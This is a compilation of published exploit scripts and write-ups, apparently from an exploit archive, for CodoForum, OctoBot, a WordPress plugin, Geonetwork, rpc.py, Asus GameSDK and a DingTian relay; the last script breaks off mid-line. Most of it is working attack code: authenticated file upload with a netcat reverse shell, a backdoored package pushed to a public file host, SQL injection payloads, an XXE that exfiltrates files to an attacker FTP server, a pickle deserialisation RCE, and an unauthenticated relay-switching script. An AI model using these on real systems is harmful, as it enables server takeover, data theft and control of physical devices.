
CodoForum v5.1 - Remote Code Execution (RCE)
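#!/usr/bin/python3
# Exploit Title: CodoForum v5.1 - Remote Code Execution (RCE)
# Date: 06/07/2022
# Exploit Author: Krish Pandey (@vikaran101)
# Vendor Homepage: https://codoforum.com/
# Software Link: https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip
# Version: CodoForum v5.1
# Tested on: Ubuntu 20.04
# CVE: CVE-2022-31854
"""CodoForum v5.1 authenticated arbitrary file upload -> RCE (CVE-2022-31854).

The admin "Global Settings" form (/admin/index.php?page=config) takes the forum
logo as a file upload and stores it under /sites/default/assets/img/attachments/
without restricting the extension, so a .php file lands where the web server
executes it.  The script:

  1. logs in to the admin panel with the supplied credentials;
  2. submits the settings form with a .php reverse shell as `forum_logo`;
  3. requests the uploaded file to trigger it.

Side effect on the target: step 2 re-submits every global setting with the
values captured in the original PoC (site title "CODOLOGIC", admin e-mail
admin@codologic.com, Europe/London timezone, ...), so the target's forum
configuration is overwritten.  Record the current settings first if that matters.

Usage:
  ./exploit.py -t <url> -u <admin user> -p <admin pass> -i <listener ip> -n <listener port>
               [--proxy http://127.0.0.1:8080] [--csrf-token TOKEN]
"""
import optparse
import random
import re
import string
import sys

import requests

# The ASCII art lost its alignment in transit; kept for parity with the original.
BANNER = r"""
 ______ _______ ____ ___ ____ ____ _____ _ ___ ____ _ _
 / ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ // |( _ ) ___|| || |
 | | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \| |/ _ \___ \| || |_
 | |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) | | (_) |__) |__ _|
 \____| \_/ |_____| |_____|\___/_____|_____| |____/|_|\___/____/ |_|
"""

# CSRF token captured from the author's instance.  The original PoC hardcoded it;
# here it is only the last-resort fallback when the live token cannot be read
# from the settings page and --csrf-token is not given.
DEFAULT_CSRF_TOKEN = "23cc3019cadb6891ebd896ae9bde3d95"

# Same mkfifo/nc reverse shell as the original PoC; {ip}/{port} are filled in.
PHP_REVERSE_SHELL = '<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {ip} {port} >/tmp/f");?>'

# Every non-file field of the Global Settings form, with the values from the
# captured request.  The form is saved as a whole, so all of them are sent.
SETTINGS_FIELDS = {
    "site_title": "CODOLOGIC",
    "site_description": "codoforum - Enhancing your forum experience with next generation technology!",
    "admin_email": "admin@codologic.com",
    "default_timezone": "Europe/London",
    "register_pass_min": "8",
    "num_posts_all_topics": "30",
    "num_posts_cat_topics": "20",
    "num_posts_per_topic": "20",
    "forum_attachments_path": "assets/img/attachments",
    "forum_attachments_exts": "jpg,jpeg,png,gif,pjpeg,bmp,txt",
    "forum_attachments_size": "3",
    "forum_attachments_mimetypes": "image/*,text/plain",
    "forum_tags_num": "5",
    "forum_tags_len": "15",
    "reply_min_chars": "10",
    "insert_oembed_videos": "yes",
    "forum_privacy": "everyone",
    "approval_notify_mails": "",
    "forum_header_menu": "site_title",
    "login_by": "USERNAME",
    "force_https": "no",
    "user_redirect_after_login": "topics",
    "sidebar_hide_topic_messages": "off",
    "sidebar_infinite_scrolling": "on",
    "show_sticky_topics_without_permission": "no",
}


def build_php_payload(ip, port):
    """Return the PHP source that connects a shell back to ip:port."""
    return PHP_REVERSE_SHELL.format(ip=ip, port=port)


def random_filename(length=10):
    """Random lowercase name for the uploaded .php so repeated runs don't collide."""
    return "".join(random.choice(string.ascii_lowercase) for _ in range(length))


def parse_args(argv=None):
    """Parse the CLI (argv=None reads sys.argv).

    Prints the usage hint and exits with status 1 when any of -t/-u/-p/-i/-n
    is missing, as the original did.  A trailing "/" on the target is dropped
    so the URL joins below don't produce "//".
    """
    parser = optparse.OptionParser()
    parser.add_option('-t', '--target-url', action="store", dest='target', help='path of the CodoForum v5.1 install')
    parser.add_option('-u', '--username', action="store", dest='username', help='admin username')
    parser.add_option('-p', '--password', action="store", dest='password', help='admin password')
    parser.add_option('-i', '--listener-ip', action="store", dest='ip', help='listener address')
    parser.add_option('-n', '--port', action="store", dest='port', help='listener port number')
    parser.add_option('--proxy', action="store", dest='proxy', default=None,
                      help='optional HTTP(S) proxy, e.g. http://127.0.0.1:8080 '
                           '(the original PoC always routed through Burp on that address)')
    parser.add_option('--csrf-token', action="store", dest='csrf_token', default=None,
                      help='CSRF_token value for the settings form, if auto-detection fails')
    options, _args = parser.parse_args(argv)
    if not (options.target and options.username and options.password and options.ip and options.port):
        print("[-] Missing arguments!")
        print("[*] Example usage: ./exploit.py -t [target url] -u [username] -p [password] -i [listener ip] -n [listener port]")
        print("[*] Help menu: ./exploit.py -h OR ./exploit.py --help")
        sys.exit(1)
    options.target = options.target.rstrip("/")
    return options


def login(session, target, username, password, proxies=None):
    """POST the admin credentials to /admin/?page=login.

    Returns True when the response contains the dashboard title.  The original
    PoC hand-built the multipart body with "admin"/"admin" baked in and ignored
    -u/-p; here the supplied credentials are used and requests encodes the
    multipart form (same content type as the capture).  The PHPSESSID cookie
    set by the server is kept by `session` for the later requests.
    """
    login_url = target + '/admin/?page=login'
    resp = session.post(
        login_url,
        files={'username': (None, username), 'password': (None, password)},
        cookies={'cf': '0'},
        headers={'Referer': login_url},
        proxies=proxies,
        timeout=30,
    )
    return "CODOFORUM | Dashboard" in resp.text


def fetch_csrf_token(session, target, proxies=None):
    """Best-effort read of the CSRF_token hidden field from the settings page.

    The field name comes from the captured form submission; the HTML layout
    (name="CSRF_token" ... value="...") is assumed, not verified against
    CodoForum's templates — hence the None return when nothing matches.
    """
    resp = session.get(target + '/admin/index.php?page=config', proxies=proxies, timeout=30)
    patterns = (
        r'name=["\']CSRF_token["\'][^>]*value=["\']([0-9a-fA-F]+)["\']',
        r'value=["\']([0-9a-fA-F]+)["\'][^>]*name=["\']CSRF_token["\']',
    )
    for pattern in patterns:
        match = re.search(pattern, resp.text)
        if match:
            return match.group(1)
    return None


def upload_payload(session, target, filename, php_source, csrf_token, proxies=None):
    """Submit the Global Settings form with `php_source` as the forum logo.

    Returns the Response.  The `cf`/`user_id` cookies mirror the captured
    request; the session cookie from login() is sent automatically.
    """
    data = dict(SETTINGS_FIELDS)
    data['CSRF_token'] = csrf_token
    return session.post(
        target + '/admin/index.php?page=config',
        data=data,
        files={'forum_logo': (filename, php_source, 'application/x-php')},
        cookies={'cf': '0', 'user_id': '1'},
        proxies=proxies,
        timeout=30,
    )


def trigger_payload(session, target, filename, proxies=None):
    """GET the uploaded file to run it.

    Returns the Response, or None on a read timeout.  A successful reverse
    shell keeps system() — and therefore this request — open, so the original
    script (no timeout) only printed its success message after the shell died.
    A 200 means the file is reachable and was handed to PHP; confirm execution
    on the listener.
    """
    url = target + '/sites/default/assets/img/attachments/' + filename
    try:
        return session.get(url, proxies=proxies, timeout=10)
    except requests.exceptions.ReadTimeout:
        return None


def main(argv=None):
    """Run the full chain; returns a process exit status."""
    print("\nCODOFORUM V5.1 ARBITRARY FILE UPLOAD TO RCE(Authenticated)")
    print(BANNER)
    print("\nExploit found and written by: @vikaran101\n")
    options = parse_args(argv)
    proxies = {'http': options.proxy, 'https': options.proxy} if options.proxy else None
    payload_url = options.target + '/sites/default/assets/img/attachments/'
    session = requests.Session()
    try:
        if not login(session, options.target, options.username, options.password, proxies):
            print("[-] Login failed (no dashboard in the response); check -u/-p")
            return 1
        print("[+] Login successful")
        token = options.csrf_token or fetch_csrf_token(session, options.target, proxies)
        if token is None:
            print("[*] Could not read CSRF_token from the settings page, using the captured default")
            token = DEFAULT_CSRF_TOKEN
        filename = random_filename() + '.php'
        print("[*] Uploading {} (note: this overwrites the target's global settings)".format(filename))
        upload_payload(session, options.target, filename,
                       build_php_payload(options.ip, options.port), token, proxies)
        print("[*] Checking webshell status and executing...")
        resp = trigger_payload(session, options.target, filename, proxies)
    except requests.exceptions.RequestException as exc:
        print("[-] HTTP error: {}".format(exc))
        return 1
    if resp is None or resp.status_code == 200:
        print("[+] Payload uploaded successfully and executed, check listener")
        return 0
    print("[-] Something went wrong, please try uploading the shell manually(admin panel > global settings > change forum logo > upload and access from " + payload_url + "[file.php])")
    return 1


if __name__ == "__main__":
    sys.exit(main())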
-
OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)
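#!/usr/bin/env python3
# Exploit Title: OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)
# Date: 9/2/2021
# Exploit Author: Samy Younsi, Thomas Knudsen
# Vendor Homepage: https://www.octobot.online/
# Software Link: https://github.com/Drakkar-Software/OctoBot
# Version: 0.4.0beta3 - 0.4.3
# Tested on: Linux (Ubuntu, CentOs)
# CVE : CVE-2021-36711
"""OctoBot web interface: unauthenticated Tentacle package install -> reverse shell (CVE-2021-36711).

When the web interface has no password, anyone can ask the bot to download and
install a Tentacle package from an arbitrary URL.  This script:

  1. reads the target version from /api/version;
  2. downloads the matching official package from static.octobot.online;
  3. adds a /api/sashimi Flask route to the web_interface api module that
     connects a shell back to LHOST:LPORT;
  4. repacks the zip, hosts it where the TARGET can fetch it (anonfiles.com
     by default, or a URL you host yourself via --package-url) and asks the
     target to install it;
  5. restarts the bot and hits /api/sashimi.

Everything is plain HTTP: the backdoored package and LHOST/LPORT are visible
on the wire, and the default upload publishes the package on a third-party
file host.  The target keeps the backdoored package after the run.
"""
from __future__ import print_function, unicode_literals
from bs4 import BeautifulSoup
import argparse
import os
import re
import sys
import time
import zipfile

import requests

WORKDIR = 'quests'  # where the official package is unpacked and patched
API_PATH = WORKDIR + '/reference_tentacles/Services/Interfaces/web_interface/api/'
PACKAGE_ZIP = 'any_platform.zip'  # archive name the target expects
# The target's /api/version body is untrusted; only let plain version strings
# into the local filename and the download URL built from it.
VERSION_RE = re.compile(r'^[0-9A-Za-z._-]+$')


def green(msg):
    """Wrap `msg` in the bright-green ANSI colour used for progress lines."""
    return '\033[1;92m{}\033[1;m'.format(msg)


def red(msg):
    """Wrap `msg` in the bright-red ANSI colour used for errors."""
    return '\033[1;91m{}\033[1;m'.format(msg)


def banner():
    """Print the banner (the ASCII art lost its alignment upstream)."""
    sashimiLogo = r"""
 _________ . . (.. \_ , |\ /| \ O \ /| \ \/ / \______ \/ | \ / vvvv\ \ | / |
 _ _ _ _ \^^^^ == \_/ | | | __ _ | || |__ (_)_ __ ___ (_)`\_ === \. | / __)/ _` / __| '_ \| | '_ ` _ \| |/ /\_ \ / |
 \__ | (_| \__ | | | | | | | | | | ||/ \_ \| / ( /\__,_( |_| |_|_|_| |_| |_|_| \________/ |_| |_|
"""
    print('\033[1;94m{}\033[1;m'.format(sashimiLogo))
    print('  \033[1;91mOctoBot Killer\033[1;m')
    print('  Author: \033[1;92mNaqwada\033[1;m')
    print('  RuptureFarm 1029')
    print('  FOR EDUCATIONAL PURPOSE ONLY.')


def baseUrl(RHOST, RPORT):
    """Scheme+host+port for the target; https only on 443 (the original heuristic)."""
    scheme = 'https' if RPORT == 443 else 'http'
    return '{}://{}:{}'.format(scheme, RHOST, RPORT)


def curl(url):
    """GET `url` without following redirects.

    TLS verification is disabled as in the original PoC; the 60 s timeout
    keeps a dead target from hanging the script.
    """
    return requests.get(url, allow_redirects=False, verify=False, timeout=60)


def isPassword(RHOST, RPORT):
    """GET the root page; a non-200 is taken to mean the UI is password protected."""
    return curl(baseUrl(RHOST, RPORT))


def getOctobotVersion(RHOST, RPORT):
    """GET /api/version (returns the raw Response)."""
    return curl(baseUrl(RHOST, RPORT) + '/api/version')


def sanitizeVersion(raw):
    """Turn the /api/version body (e.g. '"OctoBot 0.4.3"') into '0.4.3'.

    Raises ValueError for an empty result or one containing characters outside
    VERSION_RE — the value is used as a local filename and URL component.
    """
    version = raw.replace('"', '').replace('OctoBot ', '').strip()
    if not version or not VERSION_RE.match(version):
        raise ValueError('unexpected version string from target: {!r}'.format(raw))
    return version


def restartOctobot(RHOST, RPORT):
    """Ask the bot to restart, then wait 30 s for it to come back.

    The process usually dies mid-request, so a connection error is expected;
    the original only waited when that error was raised, which skipped the
    wait when the request happened to complete.
    """
    url = baseUrl(RHOST, RPORT) + '/commands/restart'
    try:
        requests.get(url, allow_redirects=False, verify=False, timeout=1)
    except requests.exceptions.RequestException:
        pass
    print('[+] ' + green('OctoBot is restarting ... Please wait 30 seconds.'))
    time.sleep(30)


def downloadTentaclePackage(octobotVersion):
    """Download the official package for `octobotVersion` to ./<version>.zip.

    Fails loudly on a non-2xx (the original wrote whatever came back, e.g. a
    404 page, and then failed later in ZipFile with a confusing error).
    """
    print('[+] ' + green('Start downloading Tentacle package for OctoBot {}.'.format(octobotVersion)))
    url = 'https://static.octobot.online/tentacles/officials/packages/full/base/{}/any_platform.zip'.format(octobotVersion)
    result = requests.get(url, stream=True, timeout=60)
    result.raise_for_status()
    with open('{}.zip'.format(octobotVersion), 'wb') as fd:
        for chunk in result.iter_content(chunk_size=128):
            fd.write(chunk)
    print('[+] ' + green('Download completed!'))


def unzipTentaclePackage(octobotVersion):
    """Extract ./<version>.zip into WORKDIR and delete the archive."""
    archive = '{}.zip'.format(octobotVersion)
    if not zipfile.is_zipfile(archive):
        raise RuntimeError('{} is not a zip archive; the download did not return a package'.format(archive))
    with zipfile.ZipFile(archive) as zf:
        zf.extractall(WORKDIR)
    os.remove(archive)
    print('[+] ' + green('Tentacle package has been extracted.'))


def _injectOrFail(content, marker, replacement, filename):
    """Return `content` with `marker` replaced; raise if the marker is absent.

    A silent no-op replace (the original behaviour) would ship an unmodified
    package and the final /api/sashimi request would just 404.
    """
    if marker not in content:
        raise RuntimeError('marker {!r} not found in {}; the package layout differs from the tested versions'.format(marker, filename))
    return content.replace(marker, replacement)


def injectMetadataFile(path):
    """Add the /api/sashimi reverse-shell route to <path>metadata.py.

    The route connects to LHOST:LPORT taken from the query string, dups the
    socket over stdin/stdout/stderr and spawns /bin/sh, blocking the request.
    """
    filename = '{}metadata.py'.format(path)
    with open(filename, 'r') as metadataFile:
        content = metadataFile.read()
    content = _injectOrFail(content, 'import json',
                            'import json\nimport flask\nimport sys, socket, os, pty', filename)
    content = _injectOrFail(
        content,
        '@api.api.route("/announcements")',
        '@api.api.route("/sashimi")\ndef sashimi():\n\ts = socket.socket()\n\ts.connect((flask.request.args.get("LHOST"), int(flask.request.args.get("LPORT"))))\n\t[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]\n\tpty.spawn("/bin/sh")\n\n\n@api.api.route("/announcements")',
        filename,
    )
    with open(filename, 'w') as newMetadataFile:
        newMetadataFile.write(content)


def injectInitFile(path):
    """Register `sashimi` next to `announcements` in <path>__init__.py."""
    filename = '{}__init__.py'.format(path)
    with open(filename, 'r') as initFile:
        content = initFile.read()
    content = _injectOrFail(content, 'announcements,', 'announcements,\n\tsashimi,', filename)
    content = _injectOrFail(content, '"announcements",', '"announcements",\n\t"sashimi",', filename)
    with open(filename, 'w') as newInitFile:
        newInitFile.write(content)


def craftBackdoor(octobotVersion):
    """Patch the extracted package's web_interface api module."""
    print('[+] ' + green('Crafting backdoor for Octobot Tentacle Package {}...'.format(octobotVersion)))
    injectInitFile(API_PATH)
    injectMetadataFile(API_PATH)
    print('[+] ' + green('Sashimi malicious Tentacle Package for OctoBot {} created!'.format(octobotVersion)))


def rePackTentaclePackage():
    """Zip WORKDIR back into PACKAGE_ZIP with paths relative to WORKDIR."""
    print('[+] ' + green('Repacking Tentacle package.'))
    with zipfile.ZipFile(PACKAGE_ZIP, mode='w') as zipf:
        for root, _, files in os.walk(WORKDIR):
            for file in files:
                file_path = os.path.join(root, file)
                zipf.write(file_path, os.path.relpath(file_path, WORKDIR))


def uploadMaliciousTentacle():
    """Host PACKAGE_ZIP on anonfiles.com and return the direct-download URL.

    This publishes the backdoored package on a public third-party host; pass
    --package-url to host it yourself instead.  The download link is scraped
    from the anonfiles HTML (id="download-url"), so a site change breaks it.
    """
    print('[+] ' + green('Uploading Sashimi malicious Tentacle .ZIP package on anonfiles.com... May take a minute.'))
    with open(PACKAGE_ZIP, 'rb') as fh:
        response = requests.post('https://api.anonfiles.com/upload', files={'file': fh}, timeout=60)
    response.raise_for_status()
    zipLink = response.json()['data']['file']['url']['full']
    response = requests.get(zipLink, timeout=60)
    soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
    link = soup.find(id='download-url')
    if link is None:
        raise RuntimeError('could not find the download link on the anonfiles page; host the zip yourself with --package-url')
    zipLink = link.get('href')
    print('[+] ' + green('Sashimi malicious Tentacle has been successfully uploaded. {}'.format(zipLink)))
    return zipLink


def injectBackdoor(RHOST, RPORT, zipLink):
    """Tell the target to fetch and install the package at `zipLink`.

    The target downloads the zip itself, so `zipLink` must be reachable from
    the target, not just from here.  Exits when the install acknowledgement
    is not 'Tentacles installed'.
    """
    print('[+] ' + green('Injecting Sashimi malicious Tentacle packages in Ocotobot... May take a minute.'))
    url = baseUrl(RHOST, RPORT) + '/advanced/tentacle_packages?update_type=add_package'
    headers = {'X-Requested-With': 'XMLHttpRequest'}
    # json= sends the same {"<url>": "register_and_install"} body as the
    # original hand-built string, with proper escaping of the URL.
    response = requests.post(url, headers=headers, json={zipLink: 'register_and_install'},
                             verify=False, timeout=300)
    body = response.content.decode('utf-8').replace('"', '').strip()
    if os.path.exists(PACKAGE_ZIP):
        os.remove(PACKAGE_ZIP)
    if body != 'Tentacles installed':
        print('[!] ' + red('Error: Something went wrong while trying to install the malicious Tentacle package. Response: {}'.format(body)))
        sys.exit(1)
    print('[+] ' + green('Sashimi malicious Tentacle package has been successfully installed on the OctoBot target.'))


def execReverseShell(RHOST, RPORT, LHOST, LPORT):
    """Hit /api/sashimi so the target connects back to LHOST:LPORT.

    The injected route never returns while the shell is alive, so a read
    timeout here is the expected outcome of a successful callback; None is
    returned in that case.
    """
    print('[+] ' + green('Executing reverse shell on {}:{}.'.format(LHOST, LPORT)))
    url = baseUrl(RHOST, RPORT) + '/api/sashimi'
    try:
        return requests.get(url, params={'LHOST': LHOST, 'LPORT': LPORT},
                            allow_redirects=False, verify=False, timeout=60)
    except requests.exceptions.ReadTimeout:
        print('[+] ' + green('No HTTP response (expected while the shell is open); check your listener.'))
        return None


def buildParser():
    """CLI definition.  -h/--help is argparse's own (the original wired help()
    into add_argument, which printed the usage at import time)."""
    parser = argparse.ArgumentParser(
        description='POC script that exploits the Tentacles upload functionalities on OctoBot. '
                    'A vulnerability has been found and can execute a reverse shell by crafting a malicious packet. '
                    'Version affected from 0.4.0b3 to 0.4.0b10 so far.',
        epilog='Note: if you are using a hostname instead of an IP address, remove http:// or https:// and try again.')
    parser.add_argument('--RHOST', help="Refers to the IP of the target machine.", type=str, required=True)
    parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)
    parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
    parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
    parser.add_argument('--package-url', dest='package_url', default=None,
                        help="URL, reachable from the target, where you host the repacked any_platform.zip "
                             "yourself; when omitted the zip is uploaded to anonfiles.com.")
    return parser


def main(args=None):
    """Run the whole chain; `args` is an argparse Namespace (parsed from argv when None)."""
    if args is None:
        args = buildParser().parse_args()
    banner()
    try:
        if isPassword(args.RHOST, args.RPORT).status_code != 200:
            print('[!] ' + red('Error: This Octobot Platform seems to be protected with a password!'))
            sys.exit(1)
        octobotVersion = sanitizeVersion(getOctobotVersion(args.RHOST, args.RPORT).content.decode('utf-8'))
        print('[+] ' + green('Platform OctoBot {} detected.'.format(octobotVersion)))
        downloadTentaclePackage(octobotVersion)
        unzipTentaclePackage(octobotVersion)
        craftBackdoor(octobotVersion)
        rePackTentaclePackage()
        if args.package_url:
            print('[*] Upload {} to {} now, then press Enter.'.format(PACKAGE_ZIP, args.package_url))
            input()
            zipLink = args.package_url
        else:
            zipLink = uploadMaliciousTentacle()
        injectBackdoor(args.RHOST, args.RPORT, zipLink)
        restartOctobot(args.RHOST, args.RPORT)
        execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)
    except (requests.exceptions.RequestException, ValueError, RuntimeError) as exc:
        print('[!] ' + red('Error: {}'.format(exc)))
        sys.exit(1)


if __name__ == "__main__":
    main(buildParser().parse_args())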
-
WordPress Plugin Visual Slide Box Builder 3.2.9 - SQLi
# Title: WordPress Plugin Visual Slide Box Builder 3.2.9 - SQLi
# Author: nu11secur1ty
# Date: 07.11.2022
# Vendor: https://wphive.com/
# Software: https://wphive.com/plugins/wp-visual-slidebox-builder/?plugin_version=3.2.9
# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Visual-Slide-Box-Builder-plugin

## Description:
The `idx` GET parameter of the `vsbb_get_one` action in the Visual Slide Box Builder plugin for WordPress is used in a SQL query without parameterization: the UNION payload below returns attacker-chosen marker strings in the response, and the SLEEP payloads delay it. An attacker can therefore read arbitrary tables from the WordPress database (user records and password hashes included). The `action=` parameter indicates the request goes through WordPress's AJAX handler; this write-up does not say whether the action is registered for unauthenticated visitors (`wp_ajax_nopriv_`), so confirm that before treating it as pre-auth.

[+] Payloads:

```mysql
---
Parameter: idx (GET)
Type: boolean-based blind
Title: HAVING boolean-based blind - WHERE, GROUP BY clause
Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3) HAVING 1854=1854

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3) AND (SELECT 3837 FROM (SELECT(SLEEP(7)))QHbL)

Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: action=vsbb_get_one&idx=-5038 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a626a71,0x4e6b417358754d527a4a69544c57654a53574a64736b5a656e4b7968767a7a4d454243797a796d72,0x717a7a7a71),NULL,NULL#
---
```
-
Geonetwork 4.2.0 - XML External Entity (XXE)
# Exploit Title: Geonetwork 4.2.0 - XML External Entity (XXE)
# Date: 2022-July-11
# Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb)
# Vendor Homepage: https://geonetwork-opensource.org/
# Version: Geonetwork 3.10.X through 4.2.0
# Tested on: Microsoft Windows Server & Linux
# Description:
# GeoNetwork 3.1.x through 4.2.0 (note: the two version ranges in this advisory, "3.10.X" above and "3.1.x" here, do not agree; check the vendor advisory for the authoritative range)
# During rendering of a map to PDF, the XML parser is NOT configured securely: it resolves external (and parameter) entities in a document fetched from an untrusted source — the attacker-controlled `baseURL` of a `mapServer` layer — which allows arbitrary file retrieval from the server via out-of-band XXE. Because the server fetches `baseURL` itself, the same request also gives an SSRF primitive.

====================PDF RENDERING====================
POST /geonetwork/pdf/create.json HTTP/1.1
Host: REDACTED
Content-Type: application/json
Connection: close
Content-Length: 563

{"layout":"landscape","srs":"","units":"m","rotation":0,"lang":"fre","dpi":"190","outputFormat":"pdf","layers":[{"opacity":1,"type":"mapServer","baseURL":"http://attacker/xxe.xml","layers":["Tracts",], "format":"image/svg+xml","name":"xxe","extent":[-20037508.34,-20037508.34,20037508.34, 20037508.34], "tileSize":[256,256]}],"enableLegends":true,"hasTitle":true,"hasNoTitle":false,"hasAttribution":false,"pages":[{"center":[172063.3620639667,4200083.030736061],"scale":"2.5E7","dataOwner":"© ","rotation":0,"comment":"ok","title":"ok","langfre":true}]}

(The body is reproduced from the original capture; the trailing comma in `"layers":["Tracts",]` is not strict JSON and a strict parser would reject it — confirm whether the target accepts it or remove it.)

The `baseURL` parameter points at your XML file:

====================XXE_ATTACK====================
====================XXE.XML=======================
<!DOCTYPE foo [
  <!ENTITY % pe SYSTEM "http://ATTACKER/x.dtd">
  %pe;
  %param1;
]>
<foo>&external;</foo>

====================X.dtd=========================
The server then fetches x.dtd, which reads the local file and sends its contents to the attacker's FTP server:
<!ENTITY % stuff SYSTEM "file:///etc/hostname">
<!ENTITY % param1 "<!ENTITY external SYSTEM 'ftp://ATTACKER_FTP/%stuff;'>">
-
rpc.py 0.6.0 - Remote Code Execution (RCE)
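#!/usr/bin/env python3
# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 2022-07-12
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/abersheeran
# Software Link: https://github.com/abersheeran/rpc.py
# Version: v0.4.2 - v0.6.0
# Tested on: Debian 11, Ubuntu 20.04
# CVE : CVE-2022-35411
"""rpc.py v0.4.2 - v0.6.0 unauthenticated RCE (CVE-2022-35411).

The client chooses the request serializer through the `serializer` header.
Selecting `pickle` makes the server unpickle the request body, and a pickle
whose __reduce__ returns os.system runs a command on the server during
deserialization — before any RPC handler is reached.

Usage: python3 exploit.py [http://HOST:PORT/sayhi] [command]
(defaults: http://127.0.0.1:65432/sayhi and `curl http://127.0.0.1:4321`)

Note: the original file reached this corpus quoted-printable encoded
(`=3D` for `=`); that encoding is undone here.
"""
import pickle
import sys

import requests

# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py
HOST = "127.0.0.1:65432"
URL = f"http://{HOST}/sayhi"
HEADERS = {
    "serializer": "pickle"
}


def generate_payload(cmd):
    """Return pickle bytes that call os.system(cmd) when unpickled.

    Never pickle.loads() the result locally — that runs `cmd` on this machine.
    The bytes are also printed, as in the original, so they can be reused.
    """
    class PickleRce(object):
        def __reduce__(self):
            import os
            return os.system, (cmd,)

    payload = pickle.dumps(PickleRce())
    print(payload)
    return payload


def exec_command(cmd, url=URL, timeout=10):
    """POST the malicious pickle for `cmd` to `url` and return the Response.

    By the time the server answers (often with an error, since the unpickled
    object is not a valid argument), `cmd` has already run server-side.
    """
    payload = generate_payload(cmd)
    return requests.post(url=url, data=payload, headers=HEADERS, timeout=timeout)


def main(argv=None):
    """Send one command; argv = [url, command], both optional."""
    argv = sys.argv[1:] if argv is None else argv
    target = argv[0] if argv else URL
    cmd = argv[1] if len(argv) > 1 else 'curl http://127.0.0.1:4321'
    # exec_command('uname -a')
    resp = exec_command(cmd, url=target)
    print(f"[*] HTTP {resp.status_code} from {target} (the command runs during unpickling, regardless of the status)")


if __name__ == "__main__":
    main()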
-
Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path
# Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path
# Date: 07/14/2022
# Exploit Author: Angelo Pio Amirante
# Version: 1.0.0.4
# Tested on: Windows 10
# Patched version: 1.0.5.0
# CVE: CVE-2022-35899

# Step to discover the unquoted service path:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# Info on the service:
C:\>sc qc "GameSDK Service" [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: GameSDK Service TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : GameSDK Service DIPENDENZE : SERVICE_START_NAME : LocalSystem

# Exploit
If an attacker has already compromised the system and the current user can write to "C:\" or to "C:\Program Files (x86)\ASUS\", they can drop "C:\Program.exe" or "C:\Program Files (x86)\ASUS\GameSDK.exe" respectively. Because the binary path is unquoted, the Service Control Manager tries those candidates before the real "GameSDK.exe", and since the service starts automatically as LocalSystem (see TIPO_AVVIO and SERVICE_START_NAME above) the planted file runs as SYSTEM on the next service start. Note that with default Windows ACLs neither location is writable by a standard user, so this is a privilege escalation only where those permissions have been loosened.
-
Dingtian-DT-R002 3.1.276A - Authentication Bypass
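#!/usr/local/bin/python3
# Exploit Title: Dingtian-DT-R002 3.1.276A - Authentication Bypass
# Google Dork: NA
# Date: 13th July 2022
# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
# Author Github Page: https://9lyph.github.io/CVE-2022-29593/
# Vendor Homepage: https://www.dingtian-tech.com/en_us/relay4.html
# Software Link: https://www.dingtian-tech.com/en_us/support.html?tab=download
# Version: V3.1.276A
# Tested on: MAC OSX
# CVE : CVE-2022-29593
# Author: Victor Hanna (SpiderLabs)
# DingTian DT-R002 2CH Smart Relay
# CWE-294 - Authentication Bypass by Capture-replay
"""DingTian DT-R002: switch a relay without credentials (CVE-2022-29593, CWE-294).

/relay_cgi.cgi accepts the captured control request with `pwd=0` and no
session or credentials, so simply replaying it toggles the physical relay.
The original PoC built a header set (User-Agent, Referer, a static `session`
cookie) but never sent it; the bare GETs below are what it actually issued.

Usage: <script> <host> <relay#>      (relay# is 1 or 2)

Safety: this drives real relay outputs (on for HOLD_SECONDS, then off). Only
run it against a device you are authorised to control.
"""
import os
import sys
import time

import requests
from colorama import Fore, Style
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# Relay number as typed on the command line -> `relay=` index in the CGI.
RELAY_INDEX = {"1": 0, "2": 1}
HOLD_SECONDS = 5   # how long the relay stays on before it is switched off
TIMEOUT = 10       # per-request timeout; the original had none, so its Timeout handler never fired


def banner():
    """Print the author banner."""
    print("[+]********************************************************************************[+]")
    print("| Author : Victor Hanna (9lyph)[" + Fore.RED + "SpiderLabs" + Style.RESET_ALL + "]\t\t\t\t\t |")
    print("| Description: DingTian DT-R002 2CH Smart Relay |")
    print("| Usage : " + sys.argv[0] + " <host> <relay#> |")
    print("[+]********************************************************************************[+]")


def relay_url(host, relay_index, on):
    """Build the relay_cgi.cgi control URL.

    `pwd=0` is the whole bypass: no real password is sent.  `relay_index` is
    the 0-based index used by the CGI, `on` selects on=1 / on=0.
    """
    return "http://{}/relay_cgi.cgi?type=0&relay={}&on={}&time=0&pwd=0&".format(
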